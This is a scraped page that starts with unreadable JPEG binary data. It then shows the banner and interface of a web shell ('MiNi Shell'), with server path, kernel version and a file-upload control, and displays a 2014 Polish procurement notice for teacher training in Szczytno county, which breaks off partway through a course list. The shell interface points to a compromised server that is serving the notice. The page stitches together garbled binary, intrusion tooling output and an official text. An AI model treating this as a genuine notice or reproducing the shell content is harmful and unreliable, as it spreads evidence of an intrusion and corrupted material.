JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20141106/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20141106/232661-N-2014.html

<p class="kh_header"><b>Szczytno: Świadczenie usług szkoleniowych w ramach projektu pn. Nowatorski system wsparcia nauczycieli w powiecie szczycieńskim zwanego dalej projektem, współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego z Programu Operacyjnego Kapitał Ludzki</b><br>
<b>Numer ogłoszenia: 232661 - 2014; data zamieszczenia: 06.11.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Poradnia Psychologiczno-Pedagogiczna , ul. Lanca 10, 12-100 Szczytno, woj. warmińsko-mazurskie, tel. 89 624 25 92, faks 89 624 25 92.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług szkoleniowych w ramach projektu pn. Nowatorski system wsparcia nauczycieli w powiecie szczycieńskim zwanego dalej projektem, współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego z Programu Operacyjnego Kapitał Ludzki.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Opis XIV części szkoleń:
Część I tab. od 1 do 5 Liczba grup 7 Liczba godz 140 Liczba uczestn 89 
Część II tab. od 6 do 12 Liczba grup 8 Liczba godz 160 Liczba uczestn 95
Część III tab. od 13 do 15 Liczba grup 3 Liczba godz 60 Liczba uczestn 33
Część IV tab. 16 Liczba grup: 1 Liczba godz 20 Liczba uczestn 8
Część V tab. 17 Liczba grup 1 Liczba godz 20 Liczba uczestn 8
Część VI tab. od 18 do 21 Liczba grup 6 Liczba godz 120 Liczba uczestn 66
Część VII tab. od 22 do 29 Liczba grup 8 Liczba godz 160 Liczba uczestn 93
Część VIII tab. 30 Liczba grup 1 Liczba godz 20 Liczba uczestn 8
Część IX tab. 31 Liczba grup 1 Liczba godz szkolenia 20 Liczba uczestn ogółem 5
Część X tab. od 32 do 36 Liczba grup 7 Liczba godz 140 Liczba uczestn 113
Część XI tab. 37 Liczba grup 1 Liczba godz 12 Liczba uczestn 22
Część XII tab. 38 Liczba grup 1 Liczba godz 12 Liczba uczestn 25
Część XIII tab. 39 Liczba grup 1 Liczba godz 12 Liczba uczestn 20
część XIV tab. 40 Liczba grup 1 Liczba godz 12 Liczba uczestn 23
Część I.
Tab Nr 1 Doskonalenie pracy n-li ze SP w Jedwabnie - grupa I i II
 Obszar doskon: Jak pomóc uczniowi osiągnąć sukces edukacyjny?
Teoria inteligencji wielorakich np. H. Gardnera. Narzędzia do rozpoznawania stylów uczenia się, trzech podstawowych: wzrokowiec, słuchowiec, kinestetyk
Techniki uczenia się i zapamiętywania odpowiadające uczniom o poszczeg stylach uczenia się
Opracowanie szkolnej strategii diagnozowania mocnych i słabych stron ucznia oraz dopasowywania metod pracy do indywid potrzeb rozwojowych
Warsztat ewaluujący  działania n-li związane z wdrażaniem do praktyki szkolnej nowych wiadomości i umiejętności nabytych w zakresie tematyki wybranego obszaru pracy szkoły objętego wsparciem RPW
Tab nr 2 Doskonalenie pracy n-li ze SP w Dźwierzutach - grupa I i II
Obszar doskon: Jak pomóc uczniowi osiągnąć sukces edukacyjny?
Teoria inteligencji wielorakich np. H. Gardnera. Narzędzia do rozpoznawania stylów uczenia się, trzech podstawowych: wzrokowiec, słuchowiec, kinestetyk
Techniki uczenia się i zapamiętywania odpowiadające uczniom o poszczeg stylach uczenia się
Opracowanie szkolnej strategii diagnozowania mocnych i słabych stron ucznia oraz dopasowywania metod pracy do indywid potrzeb rozwojowych
Warsztat ewaluujący  działania n-li związane z wdrażaniem do praktyki szkolnej nowych wiadomości i umiejętności nabytych w zakresie tematyki wybranego obszaru pracy szkoły objętego wsparciem RPW
Tab nr 3 Doskonalenie pracy n-li z Gimnazjum w Świętajnie
Obszar doskon: Jak pomóc uczniowi osiągnąć sukces edukacyjny?
Nowatorskie metody nauczania na etapie szkoły gimnazjalnej - skuteczne, atrakcyjne rozwiązania
Indywidualizacja procesu nauczania na etapie gimnazjum, potencjał ucznia, możliwości, strategie uczenia się, wpływ rodziny - postawa rodziców
Nauczyciel wobec trudnych zachowań uczniów
rozpoznawanie przyczyny niewłaściwego zachowania
Strategie postępowania wobec trudnych zachowań uczniów
Rozmowa z rodzicem ucznia sprawiającego trudności
Warsztat ewaluujący działania n-li związane z wdrażaniem do praktyki szkolnej nowych wiadomości i umiejętności nabytych w zakresie tematyki wybranego obszaru pracy szkoły objętego wsparciem RPW
Tab nr 4 Doskonalenie pracy n-li ze SP w Rozogach
Obszar doskon: Jak pomóc uczniowi osiągnąć sukces edukacyjny?
Rozwijanie logicznego myślenia u uczniów
Poznanie zasad prowadzenia treningu twórczego myślenia
Metody stymulowania myślenia twórczego
Trening kreatywności
 Narzędzia wspierające proces efektywnego uczenia się i rozwijające umiejętność logicznego myślenia.
Gry, zabawy i ćwiczenia rozwijające logiczne myślenie uczniów
Atrakcyjne ćwiczenia, zabawy na koncentrację uwagi jako przygotowanie uczniów do logicznego myślenia
Warsztat ewaluujący działania n-li związane z wdrażaniem do praktyki szkolnej nowych wiadomości i umiejętności nabytych w zakresie tematyki wybranego obszaru pracy szkoły objętego wsparciem RPW
Tab nr 5 Doskonalenie pracy n-li ze SP w Spychowie
Obszar doskon: Jak pomóc uczniowi osiągnąć sukces edukacyjny?
Nowa formuła sprawdzianu szóstoklasisty: 
Sprawdzian szóstoklasisty po zmianach, organizacyjnych, merytorycznych,  jakościowych, podejścia do celów i wymagań egzaminac
Nowa struktura sprawdzianu
Wymagania egzaminac zawarte w podstawie programowej kształcenia ogólnego
Zasady konstruowania nowych arkuszy egzaminac
Budowa narzędzia pomiaru umiejętności uczniów
Katalog zadań egzaminac i kreatywne podejście do ich rozwiązania
Obowiązki szóstoklasisty 2015
Nowe sposoby przedstawiania wyniku sprawdzianu
 Ocenianie kształtujące - podstawy:
Założenia i elementy oceniania kształtującego
Korzyści i trudności wynikające z wprowadzenia oceniania kształtującego
Doskonalenie umiejętności oceniania kształtującego wg nauczanych przedmiotów
Atrakcyjne ćwiczenia doskonalące umiejętność cichego czytania ze zrozumieniem
Warsztat ewaluujący  działania n-li związane z wdrażaniem do praktyki szkolnej nowych wiadomości i umiejętności nabytych w zakresie tematyki wybranego obszaru pracy szkoły objętego wsparciem RPW
Część II
Tab nr 6 Doskonalenie pracy n-li z Gimnazjum z OI Nr2 w Szczytnie - grupa I i II
Obszar doskon: Ocenianie kształtujące
Moderowane spotkania zespołów n-li, poświęcone opracowaniu indywidualnych i zespołowych metod oceniania kształtującego oraz monitorowaniu i doskonaleniu wprowadzonych rozwiązań
Doskonalenie umiejętności oceniania kształtującego dla grup n-li ok. wg uczonych przedmiotów
Konspekt lekcji z OK. -zasady tworzenia konspektu lekcji z wykorzystaniem OK. Konspekty zajęć dydaktycznych i wychowawczych
Warsztat ewaluujący działania n-li związane z wdrażaniem do praktyki szkolnej nowych wiadomości i umiejętności nabytych w zakresie tematyki wybranego obszaru pracy szkoły objętego wsparciem RPW
Tab nr 7 Doskonalenie pracy n-li z Gimnazjum w Dźwierzutach
Obszar doskon: Ocenianie kształtujące
Moderowane spotkania zespołów n-li, poświęcone opracowaniu indywidualnych i zespołowych metod oceniania kształtującego oraz monitorowaniu i doskonaleniu wprowadzonych rozwiązań
Doskonalenie umiejętności oceniania kształtującego dla grup n-li np. wg uczonych przedmiotów
Konspekt lekcji z OK -zasady tworzenia konspektu lekcji z wykorzystaniem OK. Konspekty zajęć dydaktycznych i wychowawczych
Warsztat ewaluujący działania n-li związane z wdrażaniem do praktyki szkolnej nowych wiadomości i umiejętności nabytych w zakresie tematyki wybranego obszaru pracy szkoły objętego wsparciem RPW
Tab nr 8 Doskonalenie pracy n-li ze SP w Zabielach
Obszar doskon: Ocenianie kształtujące
Wprowadzenie dla całej rady pedagogicznej, Ocenianie kształtujące - podstawy
Moderowane spotkania zespołów n-li, poświęcone opracowaniu indywidualnych i zespołowych metod oceniania kształtującego oraz monitorowaniu i doskonaleniu wprowadzonych rozwiązań
Doskonalenie umiejętności oceniania kształtującego dla grup n-li np. wg uczonych przedmiotów
Warsztat ewaluujący działania n-li związane z wdrażaniem do praktyki szkolnej nowych wiadomości i umiejętności nabytych w zakresie tematyki wybranego obszaru pracy szkoły objętego wsparciem RPW
Tab nr 9 Doskonalenie pracy n-li ze SP w Szymanach
Obszar doskon: Ocenianie kształtujące
Opracowanie indywidualnych i zespołowych metod oceniania kształtującego oraz sposoby monitorowania i doskonalenia wprowadzonych rozwiązań
Doskonalenie umiejętności oceniania kształtującego dla grup n-li np. wg uczonych przedmiotów
Konspekt lekcji z OK-zasady tworzenia konspektu lekcji z wykorzystaniem OK. Konspekty zajęć dydaktycznych i wychowawczych
Warsztat ewaluujący  działania n-li związane z wdrażaniem do praktyki szkolnej nowych wiadomości i umiejętności nabytych w zakresie tematyki wybranego obszaru pracy szkoły objętego wsparciem RPW
Tab nr 10 Doskonalenie pracy n-li ze SP w Orzynach
Obszar doskon: Ocenianie kształtujące
Opracowanie indywidualnych i zespołowych metod oceniania kształtującego oraz sposoby monitorowania i doskonalenia wprowadzonych rozwiązań
Doskonalenie umiejętności oceniania kształtującego dla grup n-li ok. wg uczonych przedmiotów
Konspekt lekcji z OK. -zasady tworzenia konspektu lekcji z wykorzystaniem OK. Konspekty zajęć dydaktycznych i wychowawczych
Warsztat ewaluujący  działania n-li związane z wdrażaniem do praktyki szkolnej nowych wiadomości i umiejętności nabytych w zakresie tematyki wybranego obszaru pracy szkoły objętego wsparciem RPW
Tab nr 11 Doskonalenie pracy n-li ze SP w Kałęczynie
Obszar doskon: Ocenianie kształtujące
Teoria inteligencji wielorakich np. H. Gardnera. Narzędzia do rozpoznawania typu inteligencji, trzech podstawowych: wzrokowej, słuchowej, kinestetycznej
Techniki uczenia się i zapamiętywania odpowiadające uczniom o poszczególnych typach inteligencji
Opracowanie szkolnej strategii diagnozowania mocnych i słabych stron ucznia oraz dopasowywania metod pracy do indywidualnych potrzeb rozwojowych
Warsztat ewaluujący  działania n-li związane z wdrażaniem do praktyki szkolnej nowych wiadomości i umiejętności nabytych w zakresie tematyki wybranego obszaru pracy szkoły objętego wsparciem RPW
Tab nr 12 Doskonalenie pracy n-li ze SP w Klonie
Obszar doskonalenia: Ocenianie kształtujące
Opracowanie indywidualnych i zespołowych metod oceniania kształtującego oraz sposoby monitorowania i doskonalenia wprowadzonych rozwiązań
Doskonalenie umiejętności oceniania kształtującego dla grup n-li ok. wg uczonych przedmiotów
Konspekt lekcji z OK. -zasady tworzenia konspektu lekcji z wykorzystaniem OK. Konspekty zajęć dydaktycznych i wychowawczych
Warsztat ewaluujący  działania n-li związane z wdrażaniem do praktyki szkolnej nowych wiadomości i umiejętności nabytych w zakresie tematyki wybranego obszaru pracy szkoły objętego wsparciem RPW
Część III
Tab nr 13 Doskonalenie pracy n-li ze SP w Świętajnie
Obszar doskon: Techniki uczenia się i metody motywujące do nauki
Metody motywowania uczniów do nauki
Poznanie technik uczenia się
Wspólne opracowanie scenariusza lekcji wychowawczej dla uczniów na temat technik uczenia się
Opracowanie scenariusza warsztatów dla rodziców przeprowadzonych przez wychowawcę na temat wspierania i motywowania uczniów do nauki
Budowanie motywacji uczniów do nauki szkolnej
Stworzenie Teczki pomysłów, gromadzącej zebrane propozycje ciekawych rozwiązań motywujących uczniów do nauki
Tab nr 14 Doskonalenie pracy n-li ze SP w Jerutach
Obszar doskon: Techniki uczenia się i metody motywujące do nauki
Jak przeprowadzać diagnozę sposobów uczenia się?
Nowoczesne techniki uczenia się i motywowania uczniów do nauki. Wypracowanie katalogu metod
Jak mówić , aby dzieci nas słuchały? -praktyczne wskazówki, komunikacja interpersonalna nauczyciel -uczeń
Warsztat ewaluujący działania n-li związane z wdrażaniem do praktyki szkolnej nowych wiadomości i umiejętności nabytych w zakresie tematyki wybranego obszaru pracy szkoły objętego wsparciem RPW
Tab nr 15 Doskonalenie pracy n-li ze SP w Łatanej Wielkiej
Obszar doskon: Techniki uczenia się i metody motywujące do nauki
Diagnoza wychowawcza, inteligencja wieloraka, testy do badania, ćwiczenia z przykładami  Jak zrobić diagnozę na wejściu i w jaki sposób skutecznie ją wykorzystać?
Strategie uczenia się
Strategia nauczania, nowoczesne metody, praca z dziećmi I-VI
Warsztat ewaluujący  działania n-li związane z wdrażaniem do praktyki szkolnej nowych wiadomości i umiejętności nabytych w zakresie tematyki wybranego obszaru pracy szkoły objętego wsparciem RPW
Część IV
Tab nr 16 Doskonalenie pracy n-li ze SP w Linowie
Obszar doskon: Uczeń aktywny uczestnik procesu uczenia się
 Dobór i wykorzystanie metod pracy sprzyjających uczeniu się uczniów 
w klasach łączonych z dużą liczbą uczniów ze specjalnymi potrzebami edukacyjnymi
 Opracowanie planu działania służącego angażowaniu uczniów do uczestnictwa w doskonaleniu procesów edukacyjnych
 Ciekawe atrakcyjne formy rozwijające umiejętność cichego czytania ze zrozumieniem
 Warsztat ewaluujący działania n-li związane z wdrażaniem do praktyki szkolnej nowych wiadomości i umiejętności nabytych w zakresie tematyki wybranego obszaru pracy szkoły objętego wsparciem RPW
Część V
Tab nr17 Doskonalenie pracy n-li ze SP w Dąbrowach
Obszar doskon: Wspieranie pracy wychowawców klas
Praca wychowawcza z zespołem klasowym
 diagnoza zespołu klasowego jako podstawa skutecznej pracy wychowawców
 metody pracy z grupą, zasady kierowania zespołem
 rozpoznawanie problemów wychowawczych w klasie/grupie wychowawczej oraz sposoby ich rozwiązywania
 praktyczna realizacja godzin wychowawczych
Przeciwdziałanie przemocy i agresji:
 cele zachowań agresywnych uczniów
 wskazanie czynników sprzyjających agresji w szkole
 wskazanie sposobów kontrolowania agresji w środowisku szkolnym
 przykłady zachowań n-li w sytuacjach agresywnych zachowań uczniów, sposoby na agresywnego ucznia
Współpraca n-li z rodzicem ucznia sprawiającego trudności wychowawcze
Warsztat ewaluujący  działania n-li związane z wdrażaniem do praktyki szkolnej nowych wiadomości i umiejętności nabytych w zakresie tematyki wybranego obszaru pracy szkoły objętego wsparciem RPW
Część VI
Tab nr 18 Doskonalenie pracy n-li z Publicznego Gimnazjum w Pasymiu
Obszar doskon: Postawy uczniowskie. Jak je kształtować?
ABC wychowawcy. Rozwiązywanie konfliktów w szkole
Planowanie i wdrażanie pracy wychowawczej. Wypracowanie scenariusza lekcji wychowawczej  dotyczącej znaczenia dobrego wychowania
Współpraca z rodzicami w kontekście współodpowiedzialności za kształtowanie postaw uczniów
Warsztat ewaluujący  działania n-li związane z wdrażaniem do praktyki szkolnej nowych wiadomości i umiejętności nabytych w zakresie tematyki wybranego obszaru pracy szkoły objętego wsparciem RPW
Tab nr 19 Doskonalenie pracy n-li z Gimnazjum w Rozogach  - grupa I i II
Obszar doskon: Postawy uczniowskie. Jak je kształtować?
 Nauczyciel wobec trudnych zachowań uczniów. Kształtowanie komunikacji interpersonalnej: nauczyciel - uczeń, n-li - rodzic ucznia sprawiającego trudności wychowawcze
Współpraca z rodzicami w kontekście współodpowiedzialności za kształtowanie postaw uczniów.
Warsztat ewaluujący  działania n-li związane z wdrażaniem do praktyki szkolnej nowych wiadomości i umiejętności nabytych w zakresie tematyki wybranego obszaru pracy szkoły objętego wsparciem RPW
Tab nr20 Doskonalenie pracy n-li z Gimnazjum w Wielbarku  - grupa I i II
Obszar doskon: Postawy uczniowskie. Jak je kształtować?
 Nauczyciel wobec trudnych zachowań  uczniów
Trudny uczeń- jak integrować ucznia z zespołem klasowym
Radzenie sobie z dyscypliną na lekcji- praktyczne rozwiązania , wskazówki, metody pracy z uczniem gimnazjalnym
Warsztat ewaluujący  działania n-li związane z wdrażaniem do praktyki szkolnej nowych wiadomości i umiejętności nabytych w zakresie tematyki wybranego obszaru pracy szkoły objętego wsparciem RP
Tab nr21 Doskonalenie pracy n-li ze SP w Wawrochach
Obszar doskon: Postawy uczniowskie. Jak je kształtować?
Współpraca z rodzicami w kontekście współodpowiedzialności za kształtowanie postaw uczniowskich
ABC wychowawcy - zasady i normy zachowania uczniów. Trudne  zachowanie uczniów,  ignorancja , lekceważenie , agresja wśród uczniów .Jak radzić  sobie z tym problemem?- praktyczne wskazówki
Planowanie i wdrażanie pracy wychowawczej. Wypracowanie scenariusza lekcji wychowawczej  dotyczącej znaczenia ,dobrego wychowania
Warsztat ewaluujący  działania n-li związane z wdrażaniem do praktyki szkolnej nowych wiadomości i umiejętności nabytych w zakresie tematyki wybranego obszaru pracy szkoły objętego wsparciem RPW
Część VII
Tab nr22 Doskonalenie pracy n-li z Liceum Ogólnokształcącego w ZS Nr 1 w Szczytnie
Obszar doskon: Praca z uczniem o specjalnych potrzebach edukacyjnych
Zakres i sposoby dostosowania wymagań edukacyjnych do aktualnych możliwości psychofizycznych ucznia, metodologia
Opracowanie szkolnej strategii diagnozowania mocnych i słabych stron ucznia oraz dopasowywania metod pracy do indywidualnych potrzeb rozwojowych, sformułowanie potrzeb ucznia, określenie form, sposobów i metod pracy z uczniem, opracowanie harmonogramu
Metody pracy z uczniem o specjalnych potrzebach edukacyjnych, z uwzględnieniem metod aktywizujących.
Warsztat ewaluujący  działania n-li związane z wdrażaniem do praktyki szkolnej nowych wiadomości i umiejętności nabytych w zakresie tematyki wybranego obszaru pracy szkoły objętego wsparciem RPW
Tab nr 23 Doskonalenie pracy n-li z Liceum Ogólnokształcącego w ZS Nr 2 w Szczytnie
Obszar doskon: Praca z uczniem o specjalnych potrzebach edukacyjnych
 Zakres i sposoby dostosowania wymagań edukacyjnych do aktualnych możliwości psychofizycznych ucznia, metodologia
 Opracowanie szkolnej strategii diagnozowania mocnych i słabych stron ucznia oraz dopasowywania metod pracy do indywidualnych potrzeb rozwojowych, sformułowanie potrzeb ucznia, określenie form, sposobów i metod pracy z uczniem, opracowanie harmonogramu
 Metody pracy z uczniem o specjalnych potrzebach edukacyjnych, z uwzględnieniem metod aktywizujących.
 Warsztat ewaluujący  działania n-li związane z wdrażaniem do praktyki szkolnej nowych wiadomości i umiejętności nabytych w zakresie tematyki wybranego obszaru pracy szkoły objętego wsparciem RPW
Tab nr 24 Doskonalenie pracy n-li z Liceum Ogólnokształcącego w ZS Nr 3 w Szczytnie
Obszar doskon: Praca z uczniem o specjalnych potrzebach edukacyjnych
Rozpoznawanie indywidualnych możliwości i potrzeb uczniów. Poznanie narzędzi, metod i form pracy służących zindywidualizowaniu pracy z uczniem na etapie szkoły średniej LO - dobre praktyki
Organizacja pracy z uczniem zdolnym na etapie szkoły średniej LO - warsztat pracy, rozwiązania praktyczne
Praca z uczniem mającym trudności w nauce na etapie szkoły średniej LO- rozwiązania praktyczne
Praca z uczniem ze specyficznymi trudnościami w nauce na etapie szkoły średniej LO - rozwiązania praktyczne
Warsztat ewaluujący  działania n-li związane z wdrażaniem do praktyki szkolnej nowych wiadomości i umiejętności nabytych w zakresie tematyki wybranego obszaru pracy szkoły objętego wsparciem RPW
Tab nr 25 Doskonalenie pracy n-li z Przedszkola Niepublicznego Nr 1 w Szczytnie
Obszar doskon: Praca z uczniem o specjalnych potrzebach edukacyjnych
Określenie i wspieranie rozwoju dziecka zdolnego w wieku przedszkolnym i prowadzenie owocnej współpracy z rodzicem dziecka zdolnego
Obserwacja pedagogiczna dziecka w wieku przedszkolnym, norma a nieharmonijny rozwój dziecka, niezbędna dokumentacja n-la wychowania przedszkolnego
Tab nr 26 Doskonalenie pracy n-li z Gm. Przedszkola w Lipowcu
Obszar doskon: Praca z uczniem o specjalnych potrzebach edukacyjnych
Obserwacji pedagogicznej dziecka w wieku przedszkolnym, norma a nieharmonijny rozwój dziecka, niezbędna dokumentacja n-la przedszkola
Wielospecjalistyczna ocena poziomu funkcjonowania dziecka, tworzenie IPET, analiza orzeczenia, sformułowanie potrzeb dziecka, określenie form, sposobów i metod pracy z dzieckiem,  zakres i sposoby dostosowania wymagań edukacyjnych do aktualnych możliwości psychofizycznych, opracowanie harmonogramu
Organizacja i sposoby pracy z dzieckiem: zaniedbanym środowiskowo, nadpobudliwym, opóźnionym rozwojem mowy, zdolnym
Tab nr27 Doskonalenie pracy n-li ze SP w Kolonii
Obszar doskon: Praca z uczniem o specjalnych potrzebach edukacyjnych
Wielopoziomowe nauczanie w zespołach klasowych z dużą liczbą uczniów o specjalnych potrzebach edukacyjnych, praktyczne rozwiązania, wskazówki do pracy
 Jak pracować z uczniem o specjalnych potrzebach edukacyjnych.? Jak  go przygotować ucznia do nowej formuły sprawdzianu szóstoklasisty?
 Warsztat ewaluujący  działania n-li związane z wdrażaniem do praktyki szkolnej nowych wiadomości i umiejętności nabytych w zakresie tematyki wybranego obszaru pracy szkoły objętego wsparciem RPW
Tab nr 28 Doskonalenie pracy n-li z Gminnego Przedszkola w Nowinach
Obszar doskon: Praca z uczniem o specjalnych potrzebach edukacyjnych.
Obserwacji pedagogicznej dziecka w wieku przedszkolnym, norma a nieharmonijny rozwój dziecka, niezbędna dokumentacja n-la przedszkola
Wielospecjalistyczna ocena poziomu funkcjonowania dziecka, tworzenie IPET, analiza orzeczenia, sformułowanie potrzeb dziecka, określenie form, sposobów i metod pracy z dzieckiem,  zakres i sposoby dostosowania wymagań edukacyjnych do aktualnych możliwości psychofizycznych, opracowanie harmonogramu
Organizacja i sposoby pracy z dzieckiem: zaniedbanym środowiskowo, nadpobudliwym, opóźnionym rozwojem mowy, zdolnym
Tab nr 29 Doskonalenie pracy n-li z Miejskiego Przedszkola nr 9 w Szczytnie
 Obszar doskon: Praca z uczniem o specjalnych potrzebach edukacyjnych
Obserwacja pedagogiczna dziecka w wieku przedszkolnym, norma a nieharmonijny rozwój dziecka, niezbędna dokumentacja n-la przedszkola
Wielospecjalistyczna ocena poziomu funkcjonowania dziecka, tworzenie IPET dla dziecka z nadpobudliwością psychoruchową, analiza orzeczenia, sformułowanie potrzeb dziecka, określenie form, sposobów i metod pracy z dzieckiem,  zakres i sposoby dostosowania wymagań edukacyjnych do aktualnych możliwości psychofizycznych, opracowanie harmonogramu
Organizacja i sposoby pracy z dzieckiem:  zaniedbanym środowiskowo, nadpobudliwym, opóźnionym rozwojem mowy, zdolnym
Część VIII 
Tab nr30 Doskonalenie pracy n-li ze SP w Rudce
Obszar doskon: Wykorzystanie TIK na zajęciach edukacyjnych - bezpieczny internet
Wykorzystanie TIK w przygotowaniu i prowadzeniu zajęć lekcyjnych. Sprzęt multimedialny, programy z Multi teki.
Programy z pakietu Microsoft Office, Excel, Power Point, Publisher itp
Zasoby  internetowe - bezpieczny internet
Warsztat ewaluujący  działania n-li związane z wdrażaniem do praktyki szkolnej nowych wiadomości i umiejętności nabytych w zakresie tematyki wybranego obszaru pracy szkoły objętego wsparciem RPW
Część IX
Tab nr 31 Doskonalenie pracy n-li z Przedszkola Samorządowego w Wielbarku
Obszar doskon: Rodzice są partnerami przedszkola
Sposoby prowadzenia spotkań z rodzicami, przełamywania lęku przed wystąpieniami publicznymi, atrakcyjne i skuteczne
Radzenie sobie w sytuacjach stresowych, asertywność wobec rodziców
Sposoby angażowania rodziców w życie przedszkola, atrakcyjne, innowacyjne, nowatorskie i prowadzone metodami aktywnymi
Część X
Tab nr 32 Doskonalenie pracy n-li z Miejskiego Przedszkola Nr 2 w Szczytnie
Obszar doskon: Nauczyciel + 45
Praktyczne sposoby radzenia sobie ze stresem
Poznanie technik relaksacyjnych, sposoby kanalizacji stresów
Budzenie wiary we własne Ja
